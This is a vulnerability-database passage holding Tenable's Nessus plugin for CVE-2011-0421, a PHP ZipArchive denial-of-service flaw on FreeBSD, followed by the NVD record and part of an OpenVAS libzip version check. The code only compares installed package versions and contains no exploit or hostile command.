FreeBSD : php -- ZipArchive segfault with FL_UNCHANGED on empty archive (fe853666-56ce-11e0-9668-001fd0d616cf)
2011-03-27T00:00:00
ID FREEBSD_PKG_FE85366656CE11E09668001FD0D616CF.NASL Type nessus Reporter This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2011-03-27T00:00:00
Description
US-CERT/NIST reports :
The _zip_name_locate function in zip_name_locate.c in the Zip
extension in PHP before 5.3.6 does not properly handle a
ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent
attackers to cause a denial of service (application crash) via an
empty ZIP archive that is processed with a (1) locateName or (2)
statName operation.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(52987);
script_version("1.8");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2011-0421");
script_name(english:"FreeBSD : php -- ZipArchive segfault with FL_UNCHANGED on empty archive (fe853666-56ce-11e0-9668-001fd0d616cf)");
script_summary(english:"Checks for updated package in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:"The remote FreeBSD host is missing a security-related update."
);
script_set_attribute(
attribute:"description",
value:
"US-CERT/NIST reports :
The _zip_name_locate function in zip_name_locate.c in the Zip
extension in PHP before 5.3.6 does not properly handle a
ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent
attackers to cause a denial of service (application crash) via an
empty ZIP archive that is processed with a (1) locateName or (2)
statName operation."
);
# https://vuxml.freebsd.org/freebsd/fe853666-56ce-11e0-9668-001fd0d616cf.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?ef9f466d"
);
script_set_attribute(attribute:"solution", value:"Update the affected package.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:php5-zip");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
script_set_attribute(attribute:"vuln_publication_date", value:"2011/03/20");
script_set_attribute(attribute:"patch_publication_date", value:"2011/03/25");
script_set_attribute(attribute:"plugin_publication_date", value:"2011/03/27");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (pkg_test(save_report:TRUE, pkg:"php5-zip<5.3.6")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
else security_warning(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "FREEBSD_PKG_FE85366656CE11E09668001FD0D616CF.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : php -- ZipArchive segfault with FL_UNCHANGED on empty archive (fe853666-56ce-11e0-9668-001fd0d616cf)", "description": "US-CERT/NIST reports :\n\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation.", "published": "2011-03-27T00:00:00", "modified": "2011-03-27T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/52987", "reporter": "This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?ef9f466d"], "cvelist": ["CVE-2011-0421"], "type": "nessus", "lastseen": "2021-01-07T10:51:39", "edition": 24, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0421"]}, {"type": "openvas", "idList": ["OPENVAS:831407", "OPENVAS:136141256231069359", "OPENVAS:1361412562310831407", "OPENVAS:1361412562310862974", "OPENVAS:1361412562310862973", "OPENVAS:136141256231071955", "OPENVAS:71955", "OPENVAS:862973", "OPENVAS:862975", "OPENVAS:69359"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2DC667606D7AA02656ADD5D51EDFFA58"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:99445"]}, {"type": "exploitdb", "idList": ["EDB-ID:17004"]}, {"type": "freebsd", "idList": ["FE853666-56CE-11E0-9668-001FD0D616CF"]}, {"type": "seebug", "idList": ["SSV:20382", "SSV:71487"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11634", "SECURITYVULNS:VULN:11973", "SECURITYVULNS:VULN:11512", "SECURITYVULNS:DOC:27155", "SECURITYVULNS:DOC:25952", "SECURITYVULNS:DOC:27147", "SECURITYVULNS:DOC:26262"]}, {"type": "nessus", "idList": ["FEDORA_2011-3614.NASL", "MANDRIVA_MDVSA-2011-099.NASL", "SUSE_11_3_LIBZIP-DEVEL-110321.NASL", "SLACKWARE_SSA_2011-210-01.NASL", "SUSE_11_2_LIBZIP-DEVEL-110321.NASL", "FEDORA_2011-3636.NASL", "DEBIAN_DSA-2266.NASL", "SUSE_11_LIBZIP1-110321.NASL", "FEDORA_2011-3666.NASL", "SUSE_11_4_LIBZIP-DEVEL-110321.NASL"]}, {"type": "slackware", "idList": ["SSA-2011-210-01"]}, {"type": "fedora", "idList": ["FEDORA:CD55C111A26", "FEDORA:5BFF4110F9B", "FEDORA:57E68110E3B", "FEDORA:8F60E111A68", "FEDORA:5FE0A110FDE", "FEDORA:8A8DC1119DF", "FEDORA:92E21111A84", "FEDORA:C705211199E", "FEDORA:D0393111A65"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2262-2:2E683", "DEBIAN:DSA-2266-1:4FAC3"]}, {"type": "ubuntu", "idList": ["USN-1126-2", "USN-1126-1"]}, {"type": "f5", "idList": ["F5:K13518", "SOL13518"]}, {"type": "gentoo", "idList": ["GLSA-201110-06"]}], "modified": "2021-01-07T10:51:39", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2021-01-07T10:51:39", "rev": 2}, "vulnersScore": 5.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52987);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0421\");\n\n script_name(english:\"FreeBSD : php -- ZipArchive segfault with FL_UNCHANGED on empty archive (fe853666-56ce-11e0-9668-001fd0d616cf)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT/NIST reports :\n\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation.\"\n );\n # https://vuxml.freebsd.org/freebsd/fe853666-56ce-11e0-9668-001fd0d616cf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef9f466d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5-zip<5.3.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "52987", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php5-zip"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:39:03", "description": "The _zip_name_locate function in zip_name_locate.c in the Zip extension in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent attackers to cause a denial of service (NULL pointer dereference) via an empty ZIP archive that is processed with a (1) locateName or (2) statName operation.\nPer: http://cwe.mitre.org/data/definitions/476.html\r\n'CWE-476: NULL Pointer Dereference'", "edition": 5, "cvss3": {}, "published": "2011-03-20T02:00:00", "title": "CVE-2011-0421", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0421"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.2.16"], "id": "CVE-2011-0421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0421", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:windows:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:55:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "description": "Check for the Version of libzip", "modified": "2017-07-06T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:831407", "href": "http://plugins.openvas.org/nasl.php?oid=831407", "type": "openvas", "title": "Mandriva Update for libzip MDVSA-2011:099 (libzip)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libzip MDVSA-2011:099 (libzip)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been identified and fixed in libzip:\n\n The _zip_name_locate function in zip_name_locate.c in the Zip extension\n in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED\n argument, which might allow context-dependent attackers to cause\n a denial of service (application crash) via an empty ZIP archive\n that is processed with a (1) locateName or (2) statName operation\n (CVE-2011-0421).\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"libzip on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-05/msg00024.php\");\n script_id(831407);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:099\");\n script_cve_id(\"CVE-2011-0421\");\n script_name(\"Mandriva Update for libzip MDVSA-2011:099 (libzip)\");\n\n script_summary(\"Check for the Version of libzip\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9~1.1mdvmes5.2\", 